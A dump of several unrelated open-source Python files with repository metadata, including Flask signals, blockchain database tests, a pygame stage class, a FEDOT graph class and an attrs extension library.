"ynbVb2GjiCarC+8Assz2Y/nS/I/DCNdYSax2DNPhkEEhlxAKTpoDLnAIOex4Q"
"bYwZFtPO+ZqkMaVtJT5pJW2sCe8SKxqYaBiny2JFMvBiwdH4ciCEhhxcMpHM/"
"+9OxodEEEjSRV0kA+CHCPwfVWAC8bbNg/mS0IUJf5l0qwiiiDjweJb7qwjzlJ"
"XhX6b61u2/sedU41+hx4RMQfMioYY9RiE1Ou/////wFAQg8AAAAAABl2qRSuV"
"rTbE1VNMhxALbOWEYeu0bvtW4isAAAAAA=="
),
( # 3c9018e8d5615c306d72397f8f5eef44308c98fb576a88e030c25456b4f3a7ac
# input of
# 837dea37ddc8b1e3ce646f1a656e79bbd8cc7f558ac56a169626d649ebe2a3ba
"AQAAAAGJYyhI+ZcikVcnxcddqNstvxlDQqBCmCj2b/iPqyr31gAAAACLSDBFA"
"iEAq7yKc/4gVEgL2j8ygdotDFHihBORq9TAn0+QiiA0wY0CIFvJ5NaOr7kY8+"
"lmIzhkekQZwN4aZQq4mD8dIW4qMdjjAUEEb1XXre/2ARx+rClP5UDFeDC+gOk"
"1XIOGnJJgpLi/R2ema6y9cLgE3GPVvusUGAKSrX87CDNysdAtejfdl/9cnv//"
"//8BQEIPAAAAAAAXqRT4FbA22bu85enyoAq9G/PckelVEIcAAAAA"
)
]
TX_LIST = [Tx.from_hex(b2h(binascii.a2b_base64(b64.encode("utf8")))) for b64 in TX_B64_LIST]
TX_DB = dict((tx.hash(), tx) for tx in TX_LIST)
for h in ["315ac7d4c26d69668129cc352851d9389b4a6868f1509c6c8b66bead11e2619f",
"dbf38261224ebff0c455c405e2435cfc69adb6b8a42d7b10674d9a4eb0464dca",
"de744408e4198c0a39310c8106d1830206e8d8a5392bcf715c9b5ec97d784edd",
"485716e53b422aca0fe5b1ded21360695ce5f49255d80e10db56458ed6962ff3",
"837dea37ddc8b1e3ce646f1a656e79bbd8cc7f558ac56a169626d649ebe2a3ba"]:
tx = TX_DB.get(h2b_rev(h))
self.assertNotEqual(tx, None)
tx.unspents_from_db(TX_DB)
for idx, tx_in in enumerate(tx.txs_in):
self.assertTrue(tx.is_signature_ok(tx_in_idx=idx))
def tx_to_b64(tx_hex):
# use this to dump raw transactions in the data above
import io
tx = Tx.from_hex(tx_hex)
f = io.BytesIO()
tx.stream(f)
d = f.getvalue()
for idx in range(0, len(d), 45):
print('"%s"' % binascii.b2a_base64(d[idx:idx+45]).decode("utf8")[:-1])
if __name__ == "__main__":
unittest.main()
| 56.735577 | 108 | 0.708669 |
ac71b8ce4a1073f64368cfa634cda5c719421bc7 | 2,140 | py | Python | flask/signals.py | prasenjit/ffbird | 057873a500738383612ed21e93348dfb9ee19af2 | [
"Apache-2.0"
] | 1 | 2016-03-24T22:33:59.000Z | 2016-03-24T22:33:59.000Z | flask/signals.py | prasenjit/ffbird | 057873a500738383612ed21e93348dfb9ee19af2 | [
"Apache-2.0"
] | null | null | null | flask/signals.py | prasenjit/ffbird | 057873a500738383612ed21e93348dfb9ee19af2 | [
"Apache-2.0"
] | 1 | 2020-10-01T16:36:12.000Z | 2020-10-01T16:36:12.000Z | # -*- coding: utf-8 -*-
"""
flask.signals
~~~~~~~~~~~~~
Implements signals based on blinker if available, otherwise
falls silently back to a noop
:copyright: (c) 2014 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
signals_available = False
try:
from blinker import Namespace
signals_available = True
except ImportError:
class Namespace(object):
def signal(self, name, doc=None):
return _FakeSignal(name, doc)
class _FakeSignal(object):
"""If blinker is unavailable, create a fake class with the same
interface that allows sending of signals but will fail with an
error on anything else. Instead of doing anything on send, it
will just ignore the arguments and do nothing instead.
"""
def __init__(self, name, doc=None):
self.name = name
self.__doc__ = doc
def _fail(self, *args, **kwargs):
raise RuntimeError('signalling support is unavailable '
'because the blinker library is '
'not installed.')
send = lambda *a, **kw: None
connect = disconnect = has_receivers_for = receivers_for = \
temporarily_connected_to = connected_to = _fail
del _fail
# the namespace for code signals. If you are not flask code, do
# not put signals in here. Create your own namespace instead.
_signals = Namespace()
# core signals. For usage examples grep the sourcecode or consult
# the API documentation in docs/api.rst as well as docs/signals.rst
template_rendered = _signals.signal('template-rendered')
request_started = _signals.signal('request-started')
request_finished = _signals.signal('request-finished')
request_tearing_down = _signals.signal('request-tearing-down')
got_request_exception = _signals.signal('got-request-exception')
appcontext_tearing_down = _signals.signal('appcontext-tearing-down')
appcontext_pushed = _signals.signal('appcontext-pushed')
appcontext_popped = _signals.signal('appcontext-popped')
message_flashed = _signals.signal('message-flashed')
| 38.214286 | 71 | 0.68271 |
64108fb64d66b63598ce58eddfb7c30935ee4c97 | 11,859 | py | Python | tests/legacy_unittest/database/test_db_db.py | bayeshack2016/icon-service | 36cab484d2e41548d7f2f74526f127ee3a4423fc | [
"Apache-2.0"
] | 52 | 2018-08-24T02:28:43.000Z | 2021-07-06T04:44:22.000Z | tests/legacy_unittest/database/test_db_db.py | bayeshack2016/icon-service | 36cab484d2e41548d7f2f74526f127ee3a4423fc | [
"Apache-2.0"
] | 62 | 2018-09-17T06:59:16.000Z | 2021-12-15T06:02:51.000Z | tests/legacy_unittest/database/test_db_db.py | bayeshack2016/icon-service | 36cab484d2e41548d7f2f74526f127ee3a4423fc | [
"Apache-2.0"
] | 35 | 2018-09-14T02:42:10.000Z | 2022-02-05T10:34:46.000Z | # -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
from unittest.mock import patch
from iconservice.base.address import Address, AddressPrefix
from iconservice.base.exception import DatabaseException, InvalidParamsException
from iconservice.database.batch import BlockBatch, TransactionBatch, TransactionBatchValue, BlockBatchValue
from iconservice.database.db import ContextDatabase, MetaContextDatabase
from iconservice.database.db import KeyValueDatabase
from iconservice.database.wal import StateWAL
from iconservice.icon_constant import Revision
from iconservice.iconscore.db import IconScoreDatabase
from iconservice.iconscore.icon_score_context import IconScoreContextType, IconScoreContext
from iconservice.iconscore.icon_score_context import IconScoreFuncType
from tests import rmtree
class TestKeyValueDatabase(unittest.TestCase):
def setUp(self):
self.state_db_root_path = 'state_db'
rmtree(self.state_db_root_path)
os.mkdir(self.state_db_root_path)
self.db = KeyValueDatabase.from_path(self.state_db_root_path, True)
def tearDown(self):
self.db.close()
rmtree(self.state_db_root_path)
def test_get_and_put(self):
db = self.db
db.put(b'key0', b'value0')
value = db.get(b'key0')
self.assertEqual(b'value0', value)
value = db.get(b'key1')
self.assertIsNone(value)
def test_write_batch(self):
data = {
b'key0': BlockBatchValue(b'value0', True, [-1]),
b'key1': BlockBatchValue(b'value1', True, [-1])
}
db = self.db
db.write_batch(StateWAL(data))
self.assertEqual(b'value1', db.get(b'key1'))
self.assertEqual(b'value0', db.get(b'key0'))
class TestContextDatabaseOnWriteMode(unittest.TestCase):
def setUp(self):
state_db_root_path = 'state_db'
self.state_db_root_path = state_db_root_path
rmtree(state_db_root_path)
os.mkdir(state_db_root_path)
address = Address.from_data(AddressPrefix.CONTRACT, b'score')
context = IconScoreContext(IconScoreContextType.INVOKE)
context.block_batch = BlockBatch()
context.tx_batch = TransactionBatch()
db_path = os.path.join(state_db_root_path, 'db')
context_db = ContextDatabase.from_path(db_path, True)
meta_context_db = MetaContextDatabase(context_db.key_value_db)
self.context_db = context_db
self.meta_context_db = meta_context_db
self.address = address
self.context = context
def tearDown(self):
self.context.func_type = IconScoreFuncType.WRITABLE
self.context_db.close(self.context)
rmtree(self.state_db_root_path)
def test_put_and_get(self):
"""
"""
context = self.context
address = Address.from_data(AddressPrefix.CONTRACT, b'score')
value = 100
self.context_db._put(context, address.body, value.to_bytes(32, 'big'), True)
value = self.context_db.get(context, address.body)
self.assertEqual(100, int.from_bytes(value, 'big'))
def test_put(self):
"""WritableDatabase supports put()
"""
context = self.context
self.context_db._put(context, b'key0', b'value0', True)
value = self.context_db.get(context, b'key0')
self.assertEqual(b'value0', value)
batch = self.context.tx_batch
self.assertEqual(TransactionBatchValue(b'value0', True), batch[b'key0'])
self.context_db._put(context, b'key0', b'value1', True)
self.context_db._put(context, b'key1', b'value1', True)
self.assertEqual(len(batch), 2)
self.assertEqual(batch[b'key0'], TransactionBatchValue(b'value1', True))
self.assertEqual(batch[b'key1'], TransactionBatchValue(b'value1', True))
self.context_db._put(context, b'key2', b'value2', False)
self.context_db._put(context, b'key3', b'value3', False)
value2 = self.context_db.get(context, b'key2')
value3 = self.context_db.get(context, b'key3')
self.assertEqual(b'value2', value2)
self.assertEqual(b'value3', value3)
self.assertEqual(len(batch), 4)
self.assertEqual(batch[b'key2'], TransactionBatchValue(b'value2', False))
self.assertEqual(batch[b'key3'], TransactionBatchValue(b'value3', False))
# overwrite
self.assertRaises(DatabaseException, self.context_db._put, context, b'key3', b'value3', True)
self.assertRaises(DatabaseException, self.context_db._delete, context, b'key3', True)
def test_put_on_readonly_exception(self):
context = self.context
context.func_type = IconScoreFuncType.READONLY
with self.assertRaises(DatabaseException):
self.context_db._put(context, b'key1', b'value1', True)
def test_write_batch(self):
context = self.context
data = {
b'key0': BlockBatchValue(b'value0', True, [-1]),
b'key1': BlockBatchValue(b'value1', True, [-1])
}
db = self.context_db
db.write_batch(context, StateWAL(data))
self.assertEqual(b'value1', db.get(context, b'key1'))
self.assertEqual(b'value0', db.get(context, b'key0'))
def test_write_batch_invalid_value_format(self):
context = self.context
data = {
b'key0': b'value0',
}
db = self.context_db
with self.assertRaises(InvalidParamsException):
db.write_batch(context, StateWAL(data))
data = {
b'key0': None,
}
db = self.context_db
with self.assertRaises(InvalidParamsException):
db.write_batch(context, StateWAL(data))
data = {
b'key0': "",
}
db = self.context_db
with self.assertRaises(InvalidParamsException):
db.write_batch(context, StateWAL(data))
def test_write_batch_on_readonly_exception(self):
db = self.context_db
context = self.context
context.func_type = IconScoreFuncType.READONLY
with self.assertRaises(DatabaseException):
data = {
b'key0': b'value0',
b'key1': b'value1'
}
db.write_batch(context, data.items())
@unittest.skip('context is never none')
def test_none_context(self):
context = None
db = self.context_db
db._put(context, b'key0', b'value0', True)
self.assertEqual(b'value0', db.get(context, b'key0'))
db.delete(context, b'key0')
self.assertIsNone(db.get(context, b'key0'))
with self.assertRaises(TypeError):
db._put(context, b'key1', None, True)
def test_delete(self):
context = self.context
db = self.context_db
tx_batch = context.tx_batch
block_batch = context.block_batch
db._put(context, b'key0', b'value0', True)
db._put(context, b'key1', b'value1', True)
self.assertEqual(b'value0', db.get(context, b'key0'))
self.assertEqual(TransactionBatchValue(b'value0', True), tx_batch[b'key0'])
block_batch.update(tx_batch)
state_wal = StateWAL(block_batch)
db.write_batch(context, state_wal)
tx_batch.clear()
block_batch.clear()
self.assertEqual(0, len(tx_batch))
self.assertEqual(b'value0', db.get(context, b'key0'))
db._delete(context, b'key0', True)
db._delete(context, b'key1', False)
self.assertEqual(None, db.get(context, b'key0'))
self.assertEqual(None, db.get(context, b'key1'))
self.assertEqual(TransactionBatchValue(None, True), tx_batch[b'key0'])
self.assertEqual(TransactionBatchValue(None, False), tx_batch[b'key1'])
block_batch.update(tx_batch)
db.write_batch(context, state_wal)
tx_batch.clear()
block_batch.clear()
self.assertEqual(0, len(tx_batch))
self.assertIsNone(db.get(context, b'key0'))
self.assertIsNone(db.get(context, b'key1'))
def test_delete_on_readonly_exception(self):
context = self.context
db = self.context_db
tx_batch = context.tx_batch
db._put(context, b'key0', b'value0', True)
self.assertEqual(b'value0', db.get(context, b'key0'))
self.assertEqual(TransactionBatchValue(b'value0', True), tx_batch[b'key0'])
context.func_type = IconScoreFuncType.READONLY
with self.assertRaises(DatabaseException):
db._delete(context, b'key0', True)
context.func_type = IconScoreFuncType.WRITABLE
db._delete(context, b'key0', True)
self.assertIsNone(db.get(context, b'key0'))
self.assertEqual(TransactionBatchValue(None, True), tx_batch[b'key0'])
def test_put_and_delete_of_meta_context_db(self):
context = self.context
context_db = self.context_db
meta_context_db = self.meta_context_db
context_db.put(context, b'c_key', b'value0')
meta_context_db.put(context, b'm_key', b'value0')
self.assertEqual(TransactionBatchValue(b'value0', True), context.tx_batch[b'c_key'])
self.assertEqual(TransactionBatchValue(b'value0', False), context.tx_batch[b'm_key'])
context_db.delete(context, b'c_key')
meta_context_db.delete(context, b'm_key')
self.assertEqual(TransactionBatchValue(None, True), context.tx_batch[b'c_key'])
self.assertEqual(TransactionBatchValue(None, False), context.tx_batch[b'm_key'])
class TestIconScoreDatabase(unittest.TestCase):
def setUp(self):
state_db_root_path = 'state_db'
self.state_db_root_path = state_db_root_path
rmtree(state_db_root_path)
os.mkdir(state_db_root_path)
address = Address.from_data(AddressPrefix.CONTRACT, b'0')
db_path = os.path.join(state_db_root_path, 'db')
context_db = ContextDatabase.from_path(db_path, True)
self.db = IconScoreDatabase(address, context_db=context_db)
self.address = address
def tearDown(self):
self.db.close()
rmtree(self.state_db_root_path)
def test_address(self):
self.assertEqual(self.address, self.db.address)
@patch('iconservice.iconscore.context.context.ContextGetter._context')
def test_put_and_get(self, context):
context.current_address = self.address
context.revision = Revision.USE_RLP.value - 1
context.type = IconScoreContextType.DIRECT
context.readonly = False
db = self.db
for i in range(3):
key = f"key{i}".encode()
self.assertIsNone(db.get(key))
for i in range(3):
key = f"key{i}".encode()
value = i.to_bytes(20, "big")
self.assertIsNone(db.get(key))
db.put(key, value)
self.assertEqual(value, db.get(key))
context.revision = Revision.USE_RLP.value
for i in range(3):
key = f"key{i}".encode()
old_value = i.to_bytes(20, "big")
new_value = i.to_bytes(30, "big")
self.assertNotEqual(old_value, new_value)
self.assertEqual(old_value, db.get(key))
db.put(key, new_value)
self.assertEqual(new_value, db.get(key))
| 35.612613 | 107 | 0.656295 |
3607aa7d70a572b3800e8c0c5b62cd6f1936a230 | 818 | py | Python | client/tcp/config.py | maxschwe/PiCar | 81d83cd0f8a32d4c0faf8c36a13e09da732244d3 | [
"MIT"
] | null | null | null | client/tcp/config.py | maxschwe/PiCar | 81d83cd0f8a32d4c0faf8c36a13e09da732244d3 | [
"MIT"
] | null | null | null | client/tcp/config.py | maxschwe/PiCar | 81d83cd0f8a32d4c0faf8c36a13e09da732244d3 | [
"MIT"
] | null | null | null | import os
import logging
class Config:
# ==================================================================
# SERVER configuration
# ==================================================================
SERVER = "192.168.178.75" # SERVER = "127.0.0.1"
PORT = 4000, 10
DELAY_RECONNECTING = 3
TIMEOUT_RECONNECTING = 60
DELAY_RETRY_CONNECTING = 2
ENCODING = "utf-8"
MSG_LENGTH = 1024
# ==================================================================
# Sync configuration
# ==================================================================
USE_PC = False
PATH_PC = "/home/max/Schreibtisch/Python/PiCar/pi"
PATH_LAPTOP = "C:/Users/Max/Desktop/Daten/Python/PiCar/pi"
PATH_DATA = "data"
PATH_PI = "/home/pi/PiCar" # "C:/Users/Max/Desktop/Test"
| 29.214286 | 72 | 0.419315 |
0e859be456255546e117081ec4f5e0440976f68a | 251 | py | Python | python/pycomposer/pycomposer/__init__.py | zarzen/split-annotations | 6a8fd56eb4a39c7603634e574dce26cbdd57e162 | [
"BSD-3-Clause"
] | 53 | 2019-08-13T00:59:29.000Z | 2022-03-21T21:40:05.000Z | python/pycomposer/pycomposer/__init__.py | zarzen/split-annotations | 6a8fd56eb4a39c7603634e574dce26cbdd57e162 | [
"BSD-3-Clause"
] | 2 | 2019-10-30T17:39:05.000Z | 2020-12-24T12:58:57.000Z | python/pycomposer/pycomposer/__init__.py | zarzen/split-annotations | 6a8fd56eb4a39c7603634e574dce26cbdd57e162 | [
"BSD-3-Clause"
] | 5 | 2019-08-13T17:33:32.000Z | 2022-03-02T20:17:21.000Z |
from .composer import sa, evaluate, mut
from .split_types import SplitType, Broadcast
from .vm.driver import STOP_ITERATION
# Import the generics.
from .split_types import A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z
| 31.375 | 101 | 0.661355 |
0cc5a7bf38b26f4313ea4085e6da39c5cee00664 | 6,340 | py | Python | game/class_/stage.py | Michael78912/SMNW | da5a7278cf1a14e2af2e9c291a5f53ba21f265e2 | [
"MIT"
] | 1 | 2018-12-11T23:42:57.000Z | 2018-12-11T23:42:57.000Z | game/class_/stage.py | Michael78912/SMNW | da5a7278cf1a14e2af2e9c291a5f53ba21f265e2 | [
"MIT"
] | null | null | null | game/class_/stage.py | Michael78912/SMNW | da5a7278cf1a14e2af2e9c291a5f53ba21f265e2 | [
"MIT"
] | null | null | null | from threading import Thread
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION, KEYDOWN
import pygame as pg
import os
from . import screen
WHITE = (255, 255, 255) # unbeaten
GRAY = (211, 211, 211) # beaten
TEAL = (0, 128, 128) # peaceful
YELLOW = (128, 128, 0)
BLACK = (0, 0, 0)
STAGE_SIZE = (15, 15)
class Stage:
"""A stage class that can hold several screens. defeat a stage to move on."""
unlocked = False
beaten = False
rect_padding = 8
game_state = {}
def __init__(
self,
name,
# name to be used by the game
position_on_map,
# (x, y) cartesian system
all_screens,
# list\tuple of all screens in stage
boss_screen,
# the screen of the boss
terrain,
# the terrain class
comes_from,
# stage that you beat to unlock it (first level is None, shouldn't
# ned to put None again)
surface,
# map that the stage must be drawn on
peaceful=False,
# peaceful stage is a shop or of the like
has_icon=True,
# False if level shows upon map already, or is secret
links_to=None,
# list\tuple of all stages it links to,
decorations=(),
# tuple of decorations to be drawn
):
if comes_from is None:
comes_from = _NullStage
self.position_on_map = position_on_map
self.all_screens = all_screens
self.comes_from = comes_from
self.drawing_surface = surface
self.peaceful = peaceful
self.has_icon = has_icon
self.links_to = links_to
self.name = name
self.terrain = terrain
self.decorations = decorations
# print(os.getcwd())
with open(os.path.join(
os.getcwd(), 'music', 'smnwgameplay.mp3'
)):
print('opened successfully')
self.music = os.path.join('music', 'smnwgameplay.mp3')
self.rect = pg.Rect(position_on_map, STAGE_SIZE)
rect = self.rect
left, top, width, height = rect.left, rect.top, rect.width, rect.height
self.box = pg.Rect(left - self.rect_padding, top - self.rect_padding,
width + (self.rect_padding * 2), height +
(self.rect_padding * 2)
)
def draw_on_map(self):
"""draw the stage onto the map surface."""
surface = self.drawing_surface
if self.comes_from.beaten and self.has_icon:
self.rect = pg.draw.rect(
surface, WHITE, self.position_on_map + STAGE_SIZE)
elif self.beaten and self.has_icon:
self.rect = pg.draw.rect(
surface, GRAY, self.position_on_map + STAGE_SIZE)
if self.peaceful and self.has_icon:
self.rect = pg.draw.rect(
surface, TEAL, self.position_on_map + STAGE_SIZE)
def check_hover(self, pos):
"""check to see if the mouse is hovering over. if it is,
dislpay a box around the level, and a name.
"""
# print(left, top, width, height)
if self.box.collidepoint(*pos):
box = self.box
pg.draw.rect(self.drawing_surface, YELLOW, box, 1)
fontobj = pg.font.Font(os.path.join(
'data', 'MICHAEL`S FONT.ttf'), 20)
fontobj.set_bold(True)
surf = fontobj.render(self.name, True, BLACK)
surfrect = surf.get_rect()
surfrect.center = pos[0], pos[1] - 40
self.drawing_surface.blit(surf, surfrect)
def start_music(self):
"""stop old music, play new music."""
if not self.peaceful:
# keep the theme music if it is a peaceful screen.
pg.mixer.music.fadeout(2000)
print('howdy?')
pg.mixer.music.load(self.music)
pg.mixer.music.play(-1)
def init(self, game_state):
"""run the stage."""
self.game_state = game_state
if game_state['SETTINGS']['music']:
Thread(target=self.start_music).start()
game_state['_STAGE_DATA'] = {
'screen_number': 0,
'screen': self.all_screens[0],
'stage': self,
}
def update(self, events):
"""update the stage, and everything related to it."""
state = self.game_state
terrain_surf = self.terrain.built_image if self.terrain.built_image is not None else self.terrain.build()
display = state['MAIN_DISPLAY_SURF']
display.fill((0, 0, 0))
current_screen: screen.Screen = self.all_screens[state['_STAGE_DATA']
['screen_number']]
display.blit(terrain_surf, (0, 0))
current_screen.draw(state)
letters = []
for particle in state['PARTICLES']:
particle.draw(display)
for projectile in state['PROJECTILES']:
projectile.draw(display)
for event in events:
check_quit(event)
if event.type == MOUSEBUTTONDOWN:
state['MOUSEDOWN'] = True
elif event.type == MOUSEMOTION:
state['MOUSEDOWN'] = False
elif event.type == KEYDOWN:
letters.append(event.unicode)
if letters:
pass
if '~' in letters:
print('open terminal...')
def check_quit(event):
"""check if event is a quit event. if it is, quit."""
if event.type == QUIT:
pg.quit()
raise SystemExit
class _NullStage(Stage):
def __init__(self):
pass
position_on_map = None
all_screens = None
comes_from = None
drawing_surface = None
peaceful = None
has_icon = None
links_to = None
beaten = True
# d = pg.Surface((100, 100))
# d.fill((255, 255, 255))
# s = Stage(
# "Test Stage 0.0",
# position_on_map=(18, 569),
# all_screens=[PeacefulScreen],
# boss_screen=None,
# surface=d,
# terrain=Terrain('dirt', 'flat'),
# comes_from=None,
# peaceful=True,
# )
# s.draw_on_map()
# s.check_hover((100, 100))
# pg.image.save(d, r'C:\Users\Michael\Desktop\test_images\howdy.png')
| 29.21659 | 113 | 0.56183 |
87bd2161c3759441a2b11704d56252e7e934b39b | 177 | py | Python | mmaction/core/__init__.py | sjtuytc/mmaction2 | 7c2fba5a15ca08b81b4581e453ef6b381e4b0a52 | [
"Apache-2.0"
] | 3 | 2020-11-04T13:26:28.000Z | 2020-11-17T07:40:34.000Z | mmaction/core/__init__.py | sjtuytc/mmaction2 | 7c2fba5a15ca08b81b4581e453ef6b381e4b0a52 | [
"Apache-2.0"
] | null | null | null | mmaction/core/__init__.py | sjtuytc/mmaction2 | 7c2fba5a15ca08b81b4581e453ef6b381e4b0a52 | [
"Apache-2.0"
] | 1 | 2020-11-06T07:02:55.000Z | 2020-11-06T07:02:55.000Z | from .dist_utils import * # noqa: F401, F403
from .evaluation import * # noqa: F401, F403
from .fp16 import * # noqa: F401, F403
from .optimizer import * # noqa: F401, F403
| 35.4 | 45 | 0.683616 |
e5f6954c3b57cf5889ed3101a0fe308477b4fd85 | 3,514 | py | Python | src/exttr/core.py | altendky/exttr | 60aa5d6e9f04631b8e86552620f2d9cd2a0a3a04 | [
"MIT"
] | 1 | 2019-05-03T18:36:00.000Z | 2019-05-03T18:36:00.000Z | src/exttr/core.py | altendky/exttr | 60aa5d6e9f04631b8e86552620f2d9cd2a0a3a04 | [
"MIT"
] | 10 | 2019-02-27T19:38:04.000Z | 2019-09-01T15:59:09.000Z | src/exttr/core.py | altendky/exttr | 60aa5d6e9f04631b8e86552620f2d9cd2a0a3a04 | [
"MIT"
] | 2 | 2019-04-24T12:19:47.000Z | 2019-05-03T18:36:04.000Z | import collections
import functools
import itertools
import uuid
import attr
import exttr._utility
attr_ib_keywords = exttr._utility.get_parameter_names(attr.ib)
metadata_name = 'exttr'
class UnknownKeywordError(Exception):
pass
class KeywordCollisionError(Exception):
pass
class AttrsCollisionError(Exception):
pass
def get_all(cls, attribute):
fields = attr.fields(cls)
field = getattr(fields, attribute)
metadata = field.metadata[metadata_name]
return metadata
def get(cls, attribute, extra):
return get_all(cls=cls, attribute=attribute)[extra]
@attr.s(frozen=True)
class Keyword(object):
name = attr.ib()
uuid = attr.ib(
default=None,
converter=lambda x: None if x is None else uuid.UUID(x),
)
@attr.s
class Plugin(object):
keywords = attr.ib(factory=list, converter=list)
def register_keywords(self, *keywords):
for keyword in keywords:
self.keywords.append(keyword)
@attr.s
class Registry(object):
plugins = attr.ib(factory=list, converter=list)
def register_plugins(self, *plugins):
for plugin in plugins:
for keyword in plugin.keywords:
if keyword.name in attr_ib_keywords:
raise AttrsCollisionError(keyword)
for other_keyword in self.keywords():
name_collision = (
(keyword == other_keyword)
and (keyword.uuid is None)
)
uuid_collision = (
(keyword.uuid == other_keyword.uuid)
and (keyword.name != other_keyword.name)
)
uuid_mismatch = (
(keyword.uuid != other_keyword.uuid)
and (keyword.name == other_keyword.name)
)
if name_collision or uuid_collision or uuid_mismatch:
raise KeywordCollisionError(
'Existing: {}, New: {}'.format(
other_keyword,
keyword,
),
)
self.plugins.append(plugin)
def register_keywords(self, *keywords):
plugin = Plugin()
plugin.register_keywords(*keywords)
self.register_plugins(plugin)
@functools.wraps(attr.ib)
def create_attribute(self, *args, **kwargs):
extra_names = set(kwargs.keys()) - set(attr_ib_keywords)
unknown_names = (
extra_names - {keyword.name for keyword in self.keywords()}
)
if len(unknown_names) != 0:
raise UnknownKeywordError(
', '.join(repr(name) for name in unknown_names),
)
metadata = kwargs.setdefault('metadata', {})
exttrs_metadata = metadata.setdefault(metadata_name, {})
extras = {
k: v
for k, v in kwargs.items()
if k in extra_names
}
exttrs_metadata.update(extras)
basics = collections.OrderedDict(
(k, v)
for k, v in kwargs.items()
if k in attr_ib_keywords
)
return attr.ib(*args, **basics)
def keywords(self):
return set(itertools.chain.from_iterable(
(
keyword
for keyword in plugin.keywords
)
for plugin in self.plugins
))
| 25.280576 | 73 | 0.549516 |
2ccaf3b1e614236ab4e765321b502eac766e36d8 | 3,101 | py | Python | fedot/core/dag/graph.py | rozlana-g/FEDOT | a909d6c0ef481cc1cf7a5f10f7b1292d8d2def5c | [
"BSD-3-Clause"
] | 358 | 2020-06-11T09:34:53.000Z | 2022-03-31T12:56:22.000Z | fedot/core/dag/graph.py | rozlana-g/FEDOT | a909d6c0ef481cc1cf7a5f10f7b1292d8d2def5c | [
"BSD-3-Clause"
] | 467 | 2020-06-11T13:49:45.000Z | 2022-03-31T14:19:48.000Z | fedot/core/dag/graph.py | rozlana-g/FEDOT | a909d6c0ef481cc1cf7a5f10f7b1292d8d2def5c | [
"BSD-3-Clause"
] | 48 | 2020-07-13T14:50:45.000Z | 2022-03-26T09:37:13.000Z | from copy import deepcopy
from typing import List, Optional, TYPE_CHECKING, Union
from uuid import uuid4
from fedot.core.dag.graph_operator import GraphOperator
from fedot.core.visualisation.graph_viz import GraphVisualiser
if TYPE_CHECKING:
from fedot.core.dag.graph_node import GraphNode
class Graph:
"""
Base class used for the pipeline structure definition
:param nodes: 'GraphNode' object(s)
"""
def __init__(self, nodes: Optional[Union['GraphNode', List['GraphNode']]] = None):
self.uid = str(uuid4())
self.nodes = []
self.operator = GraphOperator(self)
if nodes:
if isinstance(nodes, list):
for node in nodes:
self.add_node(node)
else:
self.add_node(nodes)
def add_node(self, new_node: 'GraphNode'):
"""
Add new node to the Pipeline
:param new_node: new GraphNode object
"""
self.operator.add_node(new_node)
def update_node(self, old_node: 'GraphNode', new_node: 'GraphNode'):
"""
Replace old_node with new one.
:param old_node: 'GraphNode' object to replace
:param new_node: 'GraphNode' new object
"""
self.operator.update_node(old_node, new_node)
def update_subtree(self, old_subroot: 'GraphNode', new_subroot: 'GraphNode'):
"""
Replace the subtrees with old and new nodes as subroots
:param old_subroot: 'GraphNode' object to replace
:param new_subroot: 'GraphNode' new object
"""
self.operator.update_subtree(old_subroot, new_subroot)
def delete_node(self, node: 'GraphNode'):
"""
Delete chosen node redirecting all its parents to the child.
:param node: 'GraphNode' object to delete
"""
self.operator.delete_node(node)
def delete_subtree(self, subroot: 'GraphNode'):
"""
Delete the subtree with node as subroot.
:param subroot:
"""
self.operator.delete_subtree(subroot)
def show(self, path: str = None):
GraphVisualiser().visualise(self, path)
def __eq__(self, other) -> bool:
return self.operator.is_graph_equal(other)
def __str__(self):
return self.operator.graph_description()
def __repr__(self):
return self.__str__()
@property
def root_node(self):
roots = self.operator.root_node()
return roots
@property
def length(self) -> int:
return len(self.nodes)
@property
def depth(self) -> int:
return self.operator.graph_depth()
def __copy__(self):
cls = self.__class__
result = cls.__new__(cls)
result.__dict__.update(self.__dict__)
result.uid = uuid4()
return result
def __deepcopy__(self, memo=None):
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
for k, v in self.__dict__.items():
setattr(result, k, deepcopy(v, memo))
result.uid = uuid4()
return result
| 26.965217 | 86 | 0.617543 |
15c74afb25f6da3d8026b02388bee3eb3495881b | 11,796 | py | Python | tensorboard/plugins/custom_scalar/custom_scalars_plugin_test.py | tjgq/tensorboard | 751c961b90183115e4ab0ae3975d50146c0705b9 | [
"Apache-2.0"
] | 7 | 2020-04-04T16:25:42.000Z | 2021-10-02T18:26:56.000Z | tensorboard/plugins/custom_scalar/custom_scalars_plugin_test.py | tjgq/tensorboard | 751c961b90183115e4ab0ae3975d50146c0705b9 | [
"Apache-2.0"
] | 1 | 2021-09-02T14:57:13.000Z | 2021-09-02T14:57:13.000Z | tensorboard/plugins/custom_scalar/custom_scalars_plugin_test.py | tjgq/tensorboard | 751c961b90183115e4ab0ae3975d50146c0705b9 | [
"Apache-2.0"
] | 4 | 2020-08-08T18:08:44.000Z | 2021-05-13T05:22:40.000Z | # -*- coding: utf-8 -*-
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for the Custom Scalars Plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
from google.protobuf import json_format
from tensorboard.backend.event_processing import (
plugin_event_multiplexer as event_multiplexer,
)
from tensorboard.plugins import base_plugin
from tensorboard.plugins.custom_scalar import custom_scalars_plugin
from tensorboard.plugins.custom_scalar import layout_pb2
